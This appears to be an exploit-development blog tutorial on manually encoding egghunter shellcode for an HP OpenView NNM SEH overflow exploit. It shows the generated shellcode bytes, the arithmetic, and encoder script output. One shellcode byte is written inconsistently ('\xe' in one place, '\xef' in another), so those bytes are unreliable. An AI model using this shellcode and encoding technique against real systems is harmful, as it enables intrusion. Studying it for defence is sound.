You are probably wondering what this post is all about, well….it’s about manually encoding egghunter shellcode
why would you want to manually encode the shellcode if you have built in encoders in the metasploit framework ?
Before we begin have a look at the following exploit by muts : HP OpenView NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit
I wont go into much details about the process because most of it already been discussed on the Offensive Security HP NNM 0day Presentation , and on the Peter Van Eeckhoutte’s Blog – Exploit writing tutorial part 8 : Win32 Egg Hunting at the “Hand-crafting the encoder” and “Seeing this code run and reproduce the original egghunter is nice, but how can you build your own decoder ? “ sections of the tutorial.
What I’m about to show here is the calculations made in order for our shellcode to be bad chars free, well, doing it manually can can be a pain….
Due to large amount of bad characters we need to manually encode the egghunter using a limited allowed set of chars, using python we can have a script doing the calculations for us.
again, I assume you watched the offsec video and read the tutorials and already know what we are about to do here.
Detailed information about egghunters can be found in this document by skape :
1. Get the egghunter source code here: http://www.hick.org/code/skape/shellcode/win32/
or get them compiled to binaries here:
2. Generate the egghunter shellcode
C:\>egghunt.exe cstyle 0x57303054 // 32 byte egghunt shellcode (egg=0x57303054) unsigned char egghunt = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xe\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
3. breaking down our 32 byte egghunter shellcode into 8 sets of 4 bytes
"\x66\x81\xca\xff" "\x0f\x42\x52\x6a" "\x02\x58\xcd\x2e" "\x3c\x05\x5a\x74" "\xef\xb8\x54\x30" "\x30\x57\x8b\xfa" "\xaf\x75\xea\xaf" "\x75\xe7\xff\xe7"
4. We will use the following value as an example:
0xFFFFFFFF – 0x6a52420f + 1 = 0x95ADBDF1
We need to find three numbers (from the allowed character set) which when added, will give 0x95ADBDF1
Instead of calculating this manually we will use a custom made python script
Now lets split it in two: 95AD, BDF1 and feed these values into our script:
* The script contains a list of allowed chras and will use it for its calculations
exploit~#python encoder.py Usage: encoder.py <hex value>
exploit~#python encoder.py 95AD Got It!! 0x7f7f 0x152d 0x0101
exploit~#python encoder.py BDF1 Got It!! 0x7f7f 0x3d71 0x0101
7f7f7f7f 152d3d71 01010101
Let’s add our results and viola, we now have values made from the allowed char set only:
7f7f7f7f + 152d3d71 + 01010101 = 0x95ADBDF1
*** Special Thanks to: shatun for helping me by translating my needs into code ***